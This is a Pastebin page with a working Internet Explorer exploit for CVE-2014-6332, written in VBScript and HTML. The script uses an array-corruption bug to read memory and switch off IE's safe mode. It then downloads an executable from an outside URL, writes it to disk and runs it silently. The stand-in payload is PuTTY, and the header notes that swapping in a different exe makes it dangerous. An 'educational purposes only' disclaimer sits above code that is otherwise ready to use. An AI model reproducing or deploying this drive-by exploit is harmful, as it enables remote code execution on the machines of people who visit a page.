API tools faq
paste
Advertisement
Guest User

0 Day IE ExPLOIT FUNZ Tutmoses

a guest
Nov 22nd, 2014
414
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.81 KB | None | 0 0
raw download clone embed print report
  1. tutmoses for educational purposes only obviously its hardcoded for a reason to atleast protect some people as this is dangerous if u put the right exe in its path
  2.  
  3. //*
  4. tutmoses mod
  5. allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
  6. cve-2014-6332 exploit
  7. https://twitter.com/yuange75
  8. http://hi.baidu.com/yuange1975
  9.  
  10. *//
  11.  
  12. <!doctype html>
  13. <html>
  14. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
  15. <head>
  16. </head>
  17. <body>
  18.  
  19. <SCRIPT LANGUAGE="VBScript">
  20.  
  21. Sub Run(ByVal sFile)
  22. Dim shell
  23.  
  24. Set shell = CreateObject("WScript.Shell")
  25. shell.Run Chr(34) & sFile & Chr(34), 1, false
  26. Set shell = Nothing
  27. End Sub
  28.  
  29. function runmumaa()
  30.  
  31. Set oWMP = CreateObject("WMPlayer.OCX.7" )
  32. dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
  33. dim bStrm: Set bStrm = createobject("Adodb.Stream")
  34. xHttp.Open "GET", "http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", False
  35. xHttp.Send
  36.  
  37. with bStrm
  38. .type = 1 '//binary
  39. .open
  40. .write xHttp.responseBody
  41. .savetofile "C:\yolobirdie\putty.exe", 2 '//overwrite
  42. end with
  43.  
  44. Run "C:\yolobirdie\putty.exe"
  45. end function
  46.  
  47. </script>
  48.  
  49. <SCRIPT LANGUAGE="VBScript">
  50.  
  51. dim aa()
  52. dim ab()
  53. dim a0
  54. dim a1
  55. dim a2
  56. dim a3
  57. dim win9x
  58. dim intVersion
  59. dim rnda
  60. dim funclass
  61. dim myarray
  62.  
  63. Begin()
  64.  
  65. function Begin()
  66. On Error Resume Next
  67. info=Navigator.UserAgent
  68.  
  69. if(instr(info,"Win64")>0) then
  70. exit function
  71. end if
  72.  
  73. if (instr(info,"MSIE")>0) then
  74. intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  75. else
  76. exit function
  77.  
  78. end if
  79.  
  80. win9x=0
  81.  
  82. BeginInit()
  83. If Create()=True Then
  84. myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  85. myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
  86.  
  87. if(intVersion<4) then
  88. document.write("<br> IE")
  89. document.write(intVersion)
  90. runshellcode()
  91. else
  92. setnotsafemode()
  93. end if
  94. end if
  95. end function
  96.  
  97. function BeginInit()
  98. Randomize()
  99. redim aa(5)
  100. redim ab(5)
  101. a0=13+17*rnd(6)
  102. a3=7+3*rnd(5)
  103. end function
  104.  
  105. function Create()
  106. On Error Resume Next
  107. dim i
  108. Create=False
  109. For i = 0 To 400
  110. If Over()=True Then
  111. ' document.write(i)
  112. Create=True
  113. Exit For
  114. End If
  115. Next
  116. end function
  117.  
  118. sub testaa()
  119. end sub
  120.  
  121. function mydata()
  122. On Error Resume Next
  123. i=testaa
  124. i=null
  125. redim Preserve aa(a2)
  126.  
  127. ab(0)=0
  128. aa(a1)=i
  129. ab(0)=6.36598737437801E-314
  130.  
  131. aa(a1+2)=myarray
  132. ab(2)=1.74088534731324E-310
  133. mydata=aa(a1)
  134. redim Preserve aa(a0)
  135. end function
  136.  
  137.  
  138. function setnotsafemode()
  139. On Error Resume Next
  140. i=mydata()
  141. i=readmemo(i+8)
  142. i=readmemo(i+16)
  143. j=readmemo(i+&h134)
  144. for k=0 to &h60 step 4
  145. j=readmemo(i+&h120+k)
  146. if(j=14) then
  147. j=0
  148. redim Preserve aa(a2)
  149. aa(a1+2)(i+&h11c+k)=ab(4)
  150. redim Preserve aa(a0)
  151.  
  152. j=0
  153. j=readmemo(i+&h120+k)
  154.  
  155. Exit for
  156. end if
  157.  
  158. next
  159. ab(2)=1.69759663316747E-313
  160. runmumaa()
  161. end function
  162.  
  163. function Over()
  164. On Error Resume Next
  165. dim type1,type2,type3
  166. Over=False
  167. a0=a0+a3
  168. a1=a0+2
  169. a2=a0+&h8000000
  170.  
  171. redim Preserve aa(a0)
  172. redim ab(a0)
  173.  
  174. redim Preserve aa(a2)
  175.  
  176. type1=1
  177. ab(0)=1.123456789012345678901234567890
  178. aa(a0)=10
  179.  
  180. If(IsObject(aa(a1-1)) = False) Then
  181. if(intVersion<4) then
  182. mem=cint(a0+1)*16
  183. j=vartype(aa(a1-1))
  184. if((j=mem+4) or (j*8=mem+8)) then
  185. if(vartype(aa(a1-1))<>0) Then
  186. If(IsObject(aa(a1)) = False ) Then
  187. type1=VarType(aa(a1))
  188. end if
  189. end if
  190. else
  191. redim Preserve aa(a0)
  192. exit function
  193.  
  194. end if
  195. else
  196. if(vartype(aa(a1-1))<>0) Then
  197. If(IsObject(aa(a1)) = False ) Then
  198. type1=VarType(aa(a1))
  199. end if
  200. end if
  201. end if
  202. end if
  203.  
  204.  
  205. If(type1=&h2f66) Then
  206. Over=True
  207. End If
  208. If(type1=&hB9AD) Then
  209. Over=True
  210. win9x=1
  211. End If
  212.  
  213. redim Preserve aa(a0)
  214.  
  215. end function
  216.  
  217. function ReadMemo(add)
  218. On Error Resume Next
  219. redim Preserve aa(a2)
  220.  
  221. ab(0)=0
  222. aa(a1)=add+4
  223. ab(0)=1.69759663316747E-313
  224. ReadMemo=lenb(aa(a1))
  225.  
  226. ab(0)=0
  227.  
  228. redim Preserve aa(a0)
  229. end function
  230.  
  231. </script>
  232.  
  233. </body>
  234. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!